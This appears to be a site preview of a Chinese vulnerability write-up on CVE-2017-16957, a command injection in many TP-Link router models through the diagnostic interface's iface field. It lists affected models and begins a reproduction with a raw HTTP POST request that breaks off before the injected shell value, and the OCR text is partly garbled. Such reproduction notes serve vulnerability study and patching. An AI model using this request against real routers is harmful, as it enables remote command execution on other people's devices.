(CVE-2017-16957)TP-Link 命令注入漏洞.docx
《(CVE-2017-16957)TP-Link 命令注入漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2017-16957)TP-Link 命令注入漏洞.docx(19页珍藏版)》请在第壹文秘上搜索。
1、(CVE-2017-16957) TPLink 命令注入漏洞一、漏洞简介TP-LinkTL-WVR等都是中国普联(TP-LINK)公司的无线路由器产品。多款TP-Link产品中存在命令注入漏洞。远程攻击者可通过向cgi-bin/luci发送 face字段中带有shell元字符的admin/diagnostic命令利用该漏洞执行任意命令。二、漏洞影响TP-LINK TL-WVR TP-LINK TL-WVR300 v4 TP-LINK TL-WVR302 v2 TP-LINK TL- WVR450 TP-LINK TL-WVR450L TP-LINK TL-WVR450G v5 TP-LINK
2、TL-WVR458 TP-LINK TL-WVR458L TP-LINK TL-WVR458P TP-LINK TL-WVR900G v3 TP-LINK TL-WVR1200L TP-LINK TL-WVR900L TP-LINK TL-WVR1300L TP-LINK TL- WVR1300G TP-LINK TL-WVR1750L TP-LINK TL-WVR2600L TP-LINK TL- WVR4300L TP-LINK TL-WAR450 TP-LINK TL-WAR302 TP-LINK TL-WAR2600L TP- LINK TL-WAR1750L TP-LINK TL-W
3、AR1300L TP-LINK TL-WAR1200L TP-LINK TL- WAR900L TP-LINK TL-WAR458 TP-LINK TL-WAR450L TP-LINK TL-ER5510G v2 TP-LINK TL-ER5510G v3 TP-LINK TL-ER5520G v2 TP-LINK TL-ER5520G v3 TP- LINK TL-ER6120G v2 TP-LlNK TL-ER6520G v2 TP-LINK TL-ER6520G v3 TP-LINK TL-ER3210G TP-LINK TL-ER7520G TP-LINK TL-ER6520G TP-
4、LINK TL-ER6510G TP- LINKTL-ER6220G TP-LINK TL-ER6120G TP-LINK TL-ER6110G TP-LINK TL- ER5120G TP-LINK TL-ER5110G TP-LINK TL-ER3220G TP-LINK TL-R479P-AC TP- LINK TL-R478G+ TP-LINK TL-R478G TP-LINK TL-R478+ TP-LINK TL-R478 TP-LINK TL-R473GP-AC TP-LINK TL-R473P-AC TP-LINK TL-R473G TP-LINK TL-R473 TP- LI
5、NKTL-R4299G TP-LINK TL-R4239G TP-LINK TL-R4149G TP-LINK TL-R488 TP- LINK TL-R483 TP-LINK TL-R483G TP-LINK TL-R479GP-AC TP-LlNK TL-R479GPE- AC三、复现过程POST cgi-bin/luciJstok=ea2178b4514da7ae227f4ecl92536930admindiagnos tic?form=diag HTTP1.1Host: 0-sec.orgContent-Length: 370Accept: applicationjsonj text/
6、javascript, */*; q=0.01 Origin: http:/192.168.3.1 X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; 64) AppleWebKit/537.3 6 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http:/192.168.3.1/
7、webpages/index.html Accept-Encoding: gzip, deflateCookie: Sysauth=be9b6f2b4b9a76a8a658el08c6197f2c Connection: closedata=%7B%22method%22%3A%22start%22%2C%22params%22%3A%7B%22type%22%3A%22 0%22%2C%22type_hidden%22%3A%220%22%2C%22ipaddr_ping%22%3A%2 2%2C%22iface-ping%22%3A%22WANl%22%2C%22ipaddr%22%3A%
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- CVE-2017-16957TP-Link 命令注入漏洞 CVE 2017 16957 TP Link 命令 注入 漏洞